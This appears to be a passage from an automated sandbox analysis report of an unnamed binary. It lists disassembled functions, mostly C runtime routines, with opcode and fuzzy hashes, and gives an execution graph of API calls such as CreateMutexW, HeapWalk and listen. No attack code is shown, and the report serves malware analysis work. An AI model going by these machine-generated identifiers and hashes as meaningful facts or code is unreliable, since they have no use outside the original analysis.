                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 03779128
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                                                                      • String ID: string too long
                                                                                                                                                                      • API String ID: 963545896-2556327735
                                                                                                                                                                      • Opcode ID: 0b2ca60e89d21fafb96efad8324948de2346ef477880e8c920d577ed8d7b7a3d
                                                                                                                                                                      • Instruction ID: cba92930d61d5e7ce82b95ddba17a5e825d4b4e680d2e28d6ddcaf957cc4bf09
                                                                                                                                                                      • Opcode Fuzzy Hash: 0b2ca60e89d21fafb96efad8324948de2346ef477880e8c920d577ed8d7b7a3d
                                                                                                                                                                      • Instruction Fuzzy Hash: BE11C476345350CBCB21CE2CE804A1AB7E9ABE7621F140A6EE291CB741C771D815C3A4
                                                                                                                                                                      Function 037793F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0377941D
                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 0377944A
                                                                                                                                                                      Strings
                                                                                                                                                                      • invalid string position, xrefs: 03779445
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                      • String ID: invalid string position
                                                                                                                                                                      • API String ID: 3614006799-1799206989
                                                                                                                                                                      • Opcode ID: 40e59f42eb299c3c28296128d02b7115b1ae4b708bd0614fab2e6ad35cbc93aa
                                                                                                                                                                      • Instruction ID: 1028f1ae4f738cf36d145fa069716451221bb25a43e6f33e648e9742ba3b0ef8
                                                                                                                                                                      • Opcode Fuzzy Hash: 40e59f42eb299c3c28296128d02b7115b1ae4b708bd0614fab2e6ad35cbc93aa
                                                                                                                                                                      • Instruction Fuzzy Hash: 690149336013109BDB24EE6CDC8478AF3A9AF42660F150A6DE6529FAC1D771EA41C3E1
                                                                                                                                                                      Function 02BD6FA1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __output_l.LIBCMT ref: 02BD6FFC
                                                                                                                                                                        • Part of subcall function 02BD70E4: __getptd_noexit.LIBCMT ref: 02BD70E4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154101487.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2bd0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd_noexit__output_l
                                                                                                                                                                      • String ID: B
                                                                                                                                                                      • API String ID: 2141734944-1255198513
                                                                                                                                                                      • Opcode ID: 9d13b0dc1e7cc3b4a828052403ade02a95932ad8b58c16c5deaaa246e36644c3
                                                                                                                                                                      • Instruction ID: 26c3cfbb534d5c28f3d13c4fa3d901ca8221c941ad22f4274a795039ba535cc1
                                                                                                                                                                      • Opcode Fuzzy Hash: 9d13b0dc1e7cc3b4a828052403ade02a95932ad8b58c16c5deaaa246e36644c3
                                                                                                                                                                      • Instruction Fuzzy Hash: 7D0169729042499BDF119FA8DC01BEEBBFAFB04364F0041A5E924A62C0EB759501DBA5
                                                                                                                                                                      Function 035FF179 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __output_l.LIBCMT ref: 035FF1D4
                                                                                                                                                                        • Part of subcall function 035FF2DA: __getptd_noexit.LIBCMT ref: 035FF2DA
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_35f0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd_noexit__output_l
                                                                                                                                                                      • String ID: B
                                                                                                                                                                      • API String ID: 2141734944-1255198513
                                                                                                                                                                      • Opcode ID: 87aa76b5352f051ca7e96a60a55cb843f290c199b1586efbdbad223d858718fb
                                                                                                                                                                      • Instruction ID: 4e9fecea39a1654b3e7a8de0aff1942ca4b305ce39d8be7a435fcefddc134715
                                                                                                                                                                      • Opcode Fuzzy Hash: 87aa76b5352f051ca7e96a60a55cb843f290c199b1586efbdbad223d858718fb
                                                                                                                                                                      • Instruction Fuzzy Hash: 7F016D75E00249AFDF10EFA4DC01AEEBBB8FB45364F144159E924AA2D0D778D501CBB5
                                                                                                                                                                      Function 03779570 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 0377957F
                                                                                                                                                                        • Part of subcall function 0377EF86: std::exception::exception.LIBCMT ref: 0377EF9B
                                                                                                                                                                        • Part of subcall function 0377EF86: __CxxThrowException@8.LIBCMT ref: 0377EFB0
                                                                                                                                                                        • Part of subcall function 0377EF86: std::exception::exception.LIBCMT ref: 0377EFC1
                                                                                                                                                                      • _memmove.LIBCMT ref: 037795B5
                                                                                                                                                                      Strings
                                                                                                                                                                      • invalid string position, xrefs: 0377957A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                      • String ID: invalid string position
                                                                                                                                                                      • API String ID: 1785806476-1799206989
                                                                                                                                                                      • Opcode ID: 6e561602548df59aa423ef116e71b339430446235cbf67c9b2f2b17bdafc727a
                                                                                                                                                                      • Instruction ID: e127d9000e8cc613ec10c13525ccffd8e229ed22466485932702a251d5df9a93
                                                                                                                                                                      • Opcode Fuzzy Hash: 6e561602548df59aa423ef116e71b339430446235cbf67c9b2f2b17bdafc727a
                                                                                                                                                                      • Instruction Fuzzy Hash: BC01A2317017218FDB25CE2CED9462AF7E7DBC65907280A2CD291CBB8AD7B1DC428794
                                                                                                                                                                      Function 0377D1C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 0377D1D4
                                                                                                                                                                        • Part of subcall function 0377EF39: std::exception::exception.LIBCMT ref: 0377EF4E
                                                                                                                                                                        • Part of subcall function 0377EF39: __CxxThrowException@8.LIBCMT ref: 0377EF63
                                                                                                                                                                        • Part of subcall function 0377EF39: std::exception::exception.LIBCMT ref: 0377EF74
                                                                                                                                                                      • _memmove.LIBCMT ref: 0377D20D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                      • String ID: vector<T> too long
                                                                                                                                                                      • API String ID: 1785806476-3788999226
                                                                                                                                                                      • Opcode ID: d0e794852cdeeb9cfeca39db95e8a6a6d9bd9df9a41b8b0d5752cb5b1117a906
                                                                                                                                                                      • Instruction ID: cf85781785123f047ad4a869e0d19d78ffad52df29cb7783939a490abe37f379
                                                                                                                                                                      • Opcode Fuzzy Hash: d0e794852cdeeb9cfeca39db95e8a6a6d9bd9df9a41b8b0d5752cb5b1117a906
                                                                                                                                                                      • Instruction Fuzzy Hash: 3C01DD779046119FEB10EE6DE895C2E7798E680251BC9822AEC12C7608E774A8158750
                                                                                                                                                                      Function 03778430 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 03778443
                                                                                                                                                                        • Part of subcall function 0377EF39: std::exception::exception.LIBCMT ref: 0377EF4E
                                                                                                                                                                        • Part of subcall function 0377EF39: __CxxThrowException@8.LIBCMT ref: 0377EF63
                                                                                                                                                                        • Part of subcall function 0377EF39: std::exception::exception.LIBCMT ref: 0377EF74
                                                                                                                                                                      • _memmove.LIBCMT ref: 0377846E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                      • String ID: vector<T> too long
                                                                                                                                                                      • API String ID: 1785806476-3788999226
                                                                                                                                                                      • Opcode ID: 2bceb334cb41c9771ae355cf3e834e3f4fe4b742e244084d21488709c33b424b
                                                                                                                                                                      • Instruction ID: 0c58be696cdc7eb4abc1f0356990a02e01ef2d10edeca4460a8c06ac29c69edb
                                                                                                                                                                      • Opcode Fuzzy Hash: 2bceb334cb41c9771ae355cf3e834e3f4fe4b742e244084d21488709c33b424b
                                                                                                                                                                      • Instruction Fuzzy Hash: 880162B16003099FDF24DEA9DC9A92BB3D9EF542147184A2DE45ACB740E670F801C761
                                                                                                                                                                      Function 02BE3414 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154101487.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2bd0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallFrame@12Setting__getptd
                                                                                                                                                                      • String ID: j
                                                                                                                                                                      • API String ID: 3454690891-2137352139
                                                                                                                                                                      • Opcode ID: 2a3c231524d2f5714940ff7c9f67256147f183406962bf184a7791e03a03933a
                                                                                                                                                                      • Instruction ID: 8929435d59c7487ddaed6665b5f73db80cc079a7f84983ba3ea02a34c19ee1ce
                                                                                                                                                                      • Opcode Fuzzy Hash: 2a3c231524d2f5714940ff7c9f67256147f183406962bf184a7791e03a03933a
                                                                                                                                                                      • Instruction Fuzzy Hash: 1311A971800264EBCF12EF58C4843BCBBB1FF00728F1880C9D89A2B682C375A991CF91
                                                                                                                                                                      Function 037906D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0379010A: __getptd.LIBCMT ref: 03790110
                                                                                                                                                                        • Part of subcall function 0379010A: __getptd.LIBCMT ref: 03790120
                                                                                                                                                                      • __getptd.LIBCMT ref: 037906E3
                                                                                                                                                                        • Part of subcall function 03783E5B: __getptd_noexit.LIBCMT ref: 03783E5E
                                                                                                                                                                        • Part of subcall function 03783E5B: __amsg_exit.LIBCMT ref: 03783E6B
                                                                                                                                                                      • __getptd.LIBCMT ref: 037906F1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 803148776-1018135373
                                                                                                                                                                      • Opcode ID: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                                                                                      • Instruction ID: e79867cc140fc6f096fa6b5c0769a01562132085a2ee3ce18a8a587070ae8107
                                                                                                                                                                      • Opcode Fuzzy Hash: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                                                                                      • Instruction Fuzzy Hash: 3B014B38811305CEEF35DF66E8886BDB7FAAF04221F684A6FD0599A250DB309581CF41
                                                                                                                                                                      Function 02BE37A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 02BE37AF
                                                                                                                                                                        • Part of subcall function 02BD98E6: __getptd_noexit.LIBCMT ref: 02BD98E9
                                                                                                                                                                        • Part of subcall function 02BD98E6: __amsg_exit.LIBCMT ref: 02BD98F6
                                                                                                                                                                      • __getptd.LIBCMT ref: 02BE37BD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154101487.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2bd0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 803148776-1018135373
                                                                                                                                                                      • Opcode ID: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                                                                                      • Instruction ID: c28a44bafd5fa0485146cb14dedc36111eeda28129167feaf5159b072e0f9c9b
                                                                                                                                                                      • Opcode Fuzzy Hash: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                                                                                      • Instruction Fuzzy Hash: 05014634800205DACF38AF21C444ABCB3F6EF04315F6488EED4A297290DB32A580DF61
                                                                                                                                                                      Function 03610093 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 036100A2
                                                                                                                                                                        • Part of subcall function 0360381A: __getptd_noexit.LIBCMT ref: 0360381D
                                                                                                                                                                        • Part of subcall function 0360381A: __amsg_exit.LIBCMT ref: 0360382A
                                                                                                                                                                      • __getptd.LIBCMT ref: 036100B0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_35f0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 803148776-1018135373
                                                                                                                                                                      • Opcode ID: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                                                                                      • Instruction ID: d585524c3454fd122af8502121ac202c1501c4f49c648fa11338e335f2956eff
                                                                                                                                                                      • Opcode Fuzzy Hash: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                                                                                      • Instruction Fuzzy Hash: F30162388053059ACF78DFA5C54166EBBB9AF00212F6C845ED4C1AA790CB3895F1CB41
                                                                                                                                                                      Function 02C737C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 02C732AE: __getptd.LIBCMT ref: 02C732B4
                                                                                                                                                                        • Part of subcall function 02C732AE: __getptd.LIBCMT ref: 02C732C4
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C737D8
                                                                                                                                                                        • Part of subcall function 02C6990F: __getptd_noexit.LIBCMT ref: 02C69912
                                                                                                                                                                        • Part of subcall function 02C6990F: __amsg_exit.LIBCMT ref: 02C6991F
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C737E6
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 803148776-1018135373
                                                                                                                                                                      • Opcode ID: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                                                                                      • Instruction ID: e0b35dacb7c7e3d7778fdb13238e0573374c274289638d6a3b778842b4c45dce
                                                                                                                                                                      • Opcode Fuzzy Hash: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                                                                                      • Instruction Fuzzy Hash: 60016D36801285CBCF34AF26C4447ACB3B6AF50215F5444AFD4905B660CB35A781FF11

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:11.1%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                      Signature Coverage:2.9%
                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                      Total number of Limit Nodes:163
                                                                                                                                                                      execution_graph 76557 198119 76558 19812e 76557->76558 76559 19817f 76558->76559 76560 198150 GetClientRect 76558->76560 76568 198136 76558->76568 76574 197cd1 76559->76574 76560->76559 76563 197cd1 6 API calls 76564 1981aa 76563->76564 76578 19687c 76564->76578 76569 19687c 6 API calls 76570 1981b6 76569->76570 76570->76569 76571 19820e 76570->76571 76572 1981df ShowWindow 76570->76572 76582 196850 76570->76582 76593 1968c4 6 API calls ctype 76570->76593 76571->76568 76588 1965ca 76571->76588 76572->76570 76575 197ce5 76574->76575 76577 197cf4 76575->76577 76594 1ea5d7 6 API calls _strcpy_s 76575->76594 76577->76563 76579 19688a 76578->76579 76580 196893 76579->76580 76595 1ea5d7 6 API calls _strcpy_s 76579->76595 76580->76570 76583 196859 76582->76583 76584 19685e 76582->76584 76596 1ea5d7 6 API calls _strcpy_s 76583->76596 76586 196877 76584->76586 76597 1ea5d7 6 API calls _strcpy_s 76584->76597 76586->76570 76589 1965de GetClientRect InvalidateRect 76588->76589 76590 196625 76588->76590 76591 196608 76589->76591 76590->76568 76598 1ca470 76591->76598 76593->76570 76594->76577 76595->76580 76596->76584 76597->76586 76600 1ca47e 76598->76600 76599 1ca48e 76599->76590 76600->76599 76608 18e185 GetDC 76600->76608 76602 1ca4c3 CreateCompatibleDC SelectObject BitBlt SelectObject 76609 1a81aa DeleteDC 76602->76609 76608->76602 76611 5f5234d2 76612 5f5234f3 76611->76612 76613 5f523505 76612->76613 76615 5f51fea4 76612->76615 76616 5f51feb2 listen 76615->76616 76617 5f51feaa 76615->76617 76616->76613 76617->76616 76618 1d531f 76621 1eea8c 76618->76621 76622 1eeabc 76621->76622 76623 1eeaa0 76621->76623 76642 1f4c42 TlsGetValue 76622->76642 76677 1e98d1 67 API calls __getptd_noexit 76623->76677 76627 1eeaa5 76678 1ea5b1 6 API calls 2 library calls 76627->76678 76631 1d533f 76632 1eeb20 76679 1e49fc 76632->76679 76636 1eeb26 76636->76631 76692 1e98f7 67 API calls 2 library calls 76636->76692 76643 1f4c57 76642->76643 76644 1eeac2 76642->76644 76693 1f4ba7 TlsGetValue 76643->76693 76647 1f05db 76644->76647 76649 1f05e4 76647->76649 76650 1eeace 76649->76650 76651 1f0602 Sleep 76649->76651 76704 2013b0 76649->76704 76650->76632 76653 1f4e30 76650->76653 76652 1f0617 76651->76652 76652->76649 76652->76650 76731 1f4db7 GetLastError 76653->76731 76655 1f4e38 76656 1eeadb 76655->76656 76745 1e7051 67 API calls 3 library calls 76655->76745 76658 1f4cd0 76656->76658 76746 1e47dc 76658->76746 76660 1f4cdc GetModuleHandleW 76661 1f4cec 76660->76661 76662 1f4cf3 76660->76662 76765 1e7021 Sleep GetModuleHandleW 76661->76765 76664 1f4d2e 76662->76664 76665 1f4d0a GetProcAddress GetProcAddress 76662->76665 76667 1f339f __lock 63 API calls 76664->76667 76665->76664 76666 1f4cf2 76666->76662 76677->76627 76681 1e4a08 __mtinitlocknum 76679->76681 76680 1e4a81 __dosmaperr __mtinitlocknum 76680->76636 76681->76680 76683 1f339f __lock 65 API calls 76681->76683 76691 1e4a47 76681->76691 76682 1e4a5c RtlFreeHeap 76682->76680 76684 1e4a6e 76682->76684 76688 1e4a1f ___sbh_find_block 76683->76688 76770 1e98d1 67 API calls __getptd_noexit 76684->76770 76686 1e4a73 GetLastError 76686->76680 76687 1e4a39 76769 1e4a52 LeaveCriticalSection _doexit 76687->76769 76688->76687 76768 1f34fd __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 76688->76768 76691->76680 76691->76682 76692->76631 76694 1f4bbf 76693->76694 76695 1f4be0 GetModuleHandleW 76693->76695 76694->76695 76696 1f4bc9 TlsGetValue 76694->76696 76697 1f4bfb GetProcAddress 76695->76697 76698 1f4bf0 76695->76698 76701 1f4bd4 76696->76701 76699 1f4bd8 TlsSetValue 76697->76699 76703 1e7021 Sleep GetModuleHandleW 76698->76703 76699->76644 76701->76695 76701->76699 76702 1f4bf6 76702->76697 76702->76699 76703->76702 76705 2013bc __mtinitlocknum 76704->76705 76706 2013f3 _memset 76705->76706 76707 2013d4 76705->76707 76711 201465 RtlAllocateHeap 76706->76711 76714 2013e9 __mtinitlocknum 76706->76714 76719 1f339f 76706->76719 76726 1f410c 5 API calls 2 library calls 76706->76726 76727 2014ac LeaveCriticalSection _doexit 76706->76727 76728 1f5437 6 API calls __decode_pointer 76706->76728 76717 1e98d1 67 API calls __getptd_noexit 76707->76717 76709 2013d9 76718 1ea5b1 6 API calls 2 library calls 76709->76718 76711->76706 76714->76649 76717->76709 76720 1f33c7 EnterCriticalSection 76719->76720 76721 1f33b4 76719->76721 76720->76706 76729 1f32dc 67 API calls 6 library calls 76721->76729 76723 1f33ba 76723->76720 76730 1e7051 67 API calls 3 library calls 76723->76730 76725 1f33c6 76725->76720 76726->76706 76727->76706 76728->76706 76729->76723 76730->76725 76732 1f4c42 ___set_flsgetvalue 8 API calls 76731->76732 76733 1f4dce 76732->76733 76734 1f4e24 SetLastError 76733->76734 76735 1f05db __calloc_crt 64 API calls 76733->76735 76734->76655 76736 1f4de2 76735->76736 76736->76734 76737 1f4ba7 __decode_pointer 6 API calls 76736->76737 76738 1f4dfc 76737->76738 76739 1f4e1b 76738->76739 76740 1f4e03 76738->76740 76742 1e49fc __mtinitlocknum 64 API calls 76739->76742 76741 1f4cd0 __initptd 64 API calls 76740->76741 76743 1f4e0b GetCurrentThreadId 76741->76743 76744 1f4e21 76742->76744 76743->76734 76744->76734 76745->76656 76746->76660 76765->76666 76768->76687 76769->76691 76770->76686 76861 169990 GetCurrentProcessId 76862 1695f0 76861->76862 76863 1699f4 CreateMutexW 76862->76863 76864 169acf 76863->76864 76865 169a1f GetLastError 76863->76865 76892 1e4647 76864->76892 76867 169a35 76865->76867 76868 169a2c WaitForSingleObject 76865->76868 76886 169740 GetProcessHeap HeapLock HeapWalk HeapWalk HeapUnlock 76867->76886 76868->76867 76869 169aef 76871 169a41 76872 169a45 76871->76872 76873 169a4c 76871->76873 76874 169ab0 ReleaseMutex 76872->76874 76887 169fa0 GetProcessHeap HeapAlloc 76873->76887 76874->76864 76876 169ac8 CloseHandle 76874->76876 76876->76864 76877 169a51 76878 169a62 76877->76878 76888 169de0 TlsAlloc RaiseException _memset __CxxThrowException@8 76877->76888 76880 169a84 76878->76880 76889 1e4656 RaiseException 76878->76889 76890 169830 GetProcessHeap HeapAlloc 76880->76890 76883 169a8f 76884 169aab 76883->76884 76891 1e4656 RaiseException 76883->76891 76884->76874 76886->76871 76887->76877 76888->76878 76889->76880 76890->76883 76891->76884 76893 1e464f 76892->76893 76894 1e4651 IsDebuggerPresent 76892->76894 76893->76869 76900 201582 76894->76900 76897 1f2a83 SetUnhandledExceptionFilter UnhandledExceptionFilter 76898 1f2aa8 GetCurrentProcess TerminateProcess 76897->76898 76899 1f2aa0 __invoke_watson 76897->76899 76898->76869 76899->76898 76900->76897 76901 19869e 76906 1986c2 _memset __EH_prolog3 76901->76906 76902 198753 IsDialogMessageW 76903 198738 ctype 76902->76903 76904 1e4647 _strlwr_s_l_stat 5 API calls 76903->76904 76905 198778 76904->76905 76906->76902 76906->76903 76907 1986fd GetClassNameW 76906->76907 76912 16b680 76907->76912 76910 198734 ctype 76910->76902 76910->76903 76913 16b6b8 76912->76913 76914 16b6d5 76913->76914 76918 16b6f2 76913->76918 76922 16da70 76914->76922 76930 16cc80 69 API calls 3 library calls 76918->76930 76919 16b6f0 76919->76910 76921 177fa1 81 API calls 2 library calls 76919->76921 76921->76910 76931 1df9af EnterCriticalSection 76922->76931 76924 16da94 FindResourceExW 76927 16da81 76924->76927 76926 1df9af 4 API calls 76926->76927 76927->76924 76927->76926 76928 16b6e0 76927->76928 76939 16dc40 LoadResource LockResource SizeofResource 76927->76939 76928->76919 76929 16c810 73 API calls 2 library calls 76928->76929 76929->76919 76930->76919 76932 1df9cc 76931->76932 76933 1df9ef LeaveCriticalSection 76931->76933 76932->76933 76935 1df9d0 76932->76935 76934 1df9f8 76933->76934 76934->76927 76936 1df9d4 LeaveCriticalSection 76935->76936 76940 1df8ce RaiseException 76935->76940 76936->76934 76939->76927 76940->76936 76941 5f4ffe46 76995 5f4eaf8a GetFileAttributesW 76941->76995 76943 5f4ffe4f 76944 5f50022c 76943->76944 76946 5f4eaf8a GetFileAttributesW 76943->76946 76945 5f4eaf8a GetFileAttributesW 76944->76945 76948 5f500279 76945->76948 76947 5f4ffe9e 76946->76947 76947->76944 76997 5f4ffd50 __EH_prolog3 76947->76997 76949 5f4eaf8a GetFileAttributesW 76948->76949 76951 5f5002c5 wsprintfW 76949->76951 76966 5f500305 76951->76966 76952 5f4ffebc _memset 76954 5f4fe124 76952->76954 76955 5f4ffefc _wcslen 76954->76955 76956 5f4fffb7 GetPrivateProfileIntW 76955->76956 76957 5f4fff11 76955->76957 76960 5f4fffee GetPrivateProfileIntW _memset 76956->76960 76961 5f4fffeb 76956->76961 76998 5f513f7c 76957->76998 76964 5f4fe124 76960->76964 76961->76960 76962 5f4fff23 _memset 77002 5f513ce4 WideCharToMultiByte 